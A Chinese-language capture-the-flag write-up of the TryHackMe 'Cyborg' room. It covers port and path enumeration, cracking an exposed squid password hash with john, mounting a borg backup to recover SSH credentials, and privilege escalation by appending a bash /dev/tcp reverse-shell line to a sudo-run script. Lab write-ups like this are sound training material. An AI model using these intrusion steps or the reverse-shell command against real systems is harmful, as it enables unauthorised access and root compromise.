• 網址：https://tryhackme.com/room/cyborgt8
• IP : 10.10.210.57

資料蒐集

• 老梗 nmap -A 10.10.210.5
  • 
• 回答問題
  • Scan the machine, how many ports are open
    • 2
  • What service is running on port 22?
    • SSH
  • What service is running on port 80?
    • HTTP
• 掃路徑
  • python3 dirsearch.py -u http://10.10.210.57/ -e all
    • /admin/
    • /etc/

Web

• 先從 /etc/ 路徑開始看裡面有啥
  • http://10.10.210.57/etc
  • 
• 找到路徑底下有一個 passwd 檔案
  • http://10.10.210.57/etc/squid/passwd
    • music_archive:$apr1$BpZ.Q.1m$F0qqPwHSOG50URuOVQTTn.
    • 看起來是密碼 hash
• 透過 john 進行爆破
  • john a.txt --wordlist=/opt/rockyou
  • 
  • 取得帳密
    • 帳號 : music_archive
    • 密碼 : squidward
• 繼續逛 /admin/
  • 發現有 Archive 可以下載
  • 
• 解開之後發現是一種奇怪格式
  • 
  • 檔案都是 binary 無法 print
  • Readme 提醒我們可以去看這個網址
    • https://borgbackup.readthedocs.io/
  • borg 是一種備份程式

Brog

• 嘗試簡單的看完說明後
  • borg list .
    • 輸入密碼，剛剛約翰破出來的 squidward
    • 可以看到一些資訊
  • borg mount . ../a
    • 把檔案掛載起來
    • 
• 發現掛載的檔案裡面有 note
  • 
  • alex:S3cretP@s3
  • 看起來就很像帳密

SSH

• 用 ssh 搭配帳密登入
  • 
  • 取得 user flag
  • 

提權

• 先用 sudo -l 看我們有什麼權限
  • 
  • 發現我們可以用 sudo 執行 /etc/mp3backups/backup.sh
• 觀察權限
  • 
  • 發現我們是這個檔案的擁有者，但我們不能修改他
  • 不過可以透過 chmod +w 新增 Write 權限
• 插入 Reverse shell
  • echo "bash -c 'bash -i >& /dev/tcp/10.13.21.55/7877 0>&1'" >> /etc/mp3backups/backup.sh
  • 直接用 reverse shell 插入檔案最下方
• 執行 shell
  • 攻擊機開啟監聽
    • nc -vlk 7877
  • 被駭機用 sudo 執行該檔案
    • sudo /etc/mp3backups/backup.sh
• 拿到 root shell!
  •